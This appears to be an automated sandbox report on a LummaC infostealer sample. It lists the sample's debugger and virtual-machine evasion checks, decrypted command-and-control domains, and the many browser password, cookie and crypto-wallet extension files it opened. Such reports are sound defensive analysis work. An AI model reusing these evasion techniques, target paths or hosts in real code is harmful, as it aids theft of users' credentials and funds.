              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70B46 second address: 4F70B91 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F646CD1477Bh 0x00000008 add cx, CD7Eh 0x0000000d jmp 00007F646CD14789h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F646CD14784h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70B91 second address: 4F70BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70BA0 second address: 4F70BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70BA6 second address: 4F70BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSpecial instruction interceptor: First address: E07E6B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSpecial instruction interceptor: First address: E07F1B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSpecial instruction interceptor: First address: FB5B8A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exe TID: 7868Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exe TID: 7884Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: 661fW9gxDp.exe, 00000000.00000002.1577828864.0000000000F85000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447407656.0000000005924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: 661fW9gxDp.exe, 00000000.00000002.1577828864.0000000000F85000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: 661fW9gxDp.exe, 00000000.00000003.1447269802.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Users\user\Desktop\661fW9gxDp.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\661fW9gxDp.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\661fW9gxDp.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: SICE
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\661fW9gxDp.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rapeflowwj.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crosshuaht.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sustainskelet.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: aspecteirs.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: energyaffai.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacebudi.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: discokeyus.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: grannyejh.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sweepyribs.lat
              Source: 661fW9gxDp.exe, 00000000.00000002.1577828864.0000000000F85000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: g.zProgram Manager
              Source: C:\Users\user\Desktop\661fW9gxDp.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1576242394.0000000005909000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1580265493.000000000590C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\661fW9gxDp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: 661fW9gxDp.exe PID: 7684, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\661fW9gxDp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
